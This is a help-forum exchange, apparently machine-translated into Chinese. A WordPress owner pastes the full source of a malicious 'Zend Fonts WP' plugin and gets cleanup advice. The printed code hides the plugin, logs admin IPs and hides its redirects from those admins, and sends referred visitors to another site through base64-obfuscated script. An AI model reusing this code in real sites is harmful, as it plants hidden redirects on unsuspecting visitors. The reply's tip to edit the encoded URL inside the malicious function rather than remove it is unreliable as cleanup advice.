我停用并删除了一个恶意插件"在我从未安装过的WordPress上它的名字是Zend字体WP。虽然,我的网站仍然被重定向到"https://makethisdaygood.com/main"那是一个我不知道的网站,而且不管用。接下来我该做什么?
下面是我删除的插件文件中的代码:
if ( ! defined( 'ABSPATH' ) ) {
exit();
}
function get_the_user_ip() {
if ( isset( $_SERVER['HTTP_CF_CONNECTION_IP'] ) ) {
$ip = $_SERVER['HTTP_CF_CONNECTION_IP'];
}
elseif ( isset( $_SERVER['HTTP_CLIENT_IP'] ) ) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
}
elseif ( isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) ) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
else {
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
function isAdminUser(){
if (current_user_can('administrator') || current_user_can('editor'))
return true;
else
return false;
}
function console_log( $data ){
echo '<script>';
echo 'console.log('. json_encode( $data ) .')';
echo '</script>';
}
//hide plugin
add_filter('all_plugins', 'hide_plugins');
function hide_plugins($plugins) {
unset($plugins['zend-fonts-wp/zend-fonts-wp.php']);
return $plugins;
}
add_action("init", "sayecho");
function sayecho(){
global $wpdb;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$user_ip = get_the_user_ip();
$isAdmin = isAdminUser();
$table_name = $wpdb->prefix."wusers_inputs";
$isBot = strpos(strtolower($user_agent), 'bot');
$timeNow = time();
$pluginTimeTableName = $wpdb->prefix.'wzen_time_table';
// $wpdb->query("DROP TABLE IF EXISTS $pluginTimeTableName");
// $wpdb->query("DROP TABLE IF EXISTS $table_name");
if ($wpdb->get_var('SHOW TABLES LIKE "'.$pluginTimeTableName.'"') != $pluginTimeTableName) {
$sql = 'CREATE TABLE '.$pluginTimeTableName.' (`time` int(11) UNSIGNED NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
require_once(ABSPATH.'wp-admin/includes/upgrade.php');
dbDelta($sql);
$wpdb->insert($pluginTimeTableName, array('time'=>$timeNow));
}
$pluginStartTime = null;
foreach($wpdb->get_results("SELECT * FROM {$pluginTimeTableName}") as $data){
$pluginStartTime = $data->time;
break;
}
//check user is not from REF, not BOT and plugin install time to skip recording your data
if(!isset($_SERVER['HTTP_REFERER']) && !$isBot && $pluginStartTime + 60 < time()) {
//if table is not exists - create table
if ( $wpdb->get_var( 'SHOW TABLES LIKE "' . $table_name . '"' ) != $table_name ) {
$sql = 'CREATE TABLE ' . $table_name . ' (`ip` varchar(535) NOT NULL,`useragent` varchar(535) NOT NULL,`adminID` int NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=utf8;';
require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
dbDelta( $sql );
}
//if admin - add IP and UA to DB
if ( $isAdmin ) {
$isIpAndUaInDB = $wpdb->get_var(
$wpdb->prepare(
"SELECT * FROM {$table_name} WHERE ip like %s AND useragent like %s LIMIT 1",
$user_ip, $user_agent ) );
if ( ! $isIpAndUaInDB ) {
$wpdb->insert( $table_name, [
'ip' => $user_ip,
'useragent' => $user_agent,
'adminID' => $isAdmin ? get_current_user_id() : - 1,
] );
}
}
}
//do redirect if user from REF and NOT Admin
if(isset( $_SERVER['HTTP_REFERER']) && !$isAdmin){
redirect();
}
}
function redirect()
{
$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');
if (!isset($_COOKIE[base64_decode('aHRfcnI=')])) {
setcookie( base64_decode( 'aHRfcnI=' ), 1, time() + 86400, base64_decode( 'Lw==' ) );
echo base64_decode( 'PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi' ) . 'https://'.$url . base64_decode( 'Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi' ) . 'https://'.$url . base64_decode( 'Ijs8L3NjcmlwdD4=' );
}
}
调试时可以执行以下步骤:
- 请在Wp Dashboard中检查您的站点URL和主页URL。 请删除。htaccess文件。(会再次生成)
- 检查wp-config.php文件,检查是否有网站url设置。
- 检查数据库wp_options表并正确设置url。
- 或使用任何外部安全插件,如"Wordfence"扫描你的网站,清理被黑的网站。
您可以将实际的url替换为现有的url,即
$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');在函数重定向块
您可以解码本网站的url名称"https://www.base64encode.org/">
例如现在这个url$url = base64_decode('bWFrZXRoaXNkYXlnb29kLmNvbS9tYWlu');指向makethisdaygood.com/main,你需要改变你的实际url。
希望能有所帮助。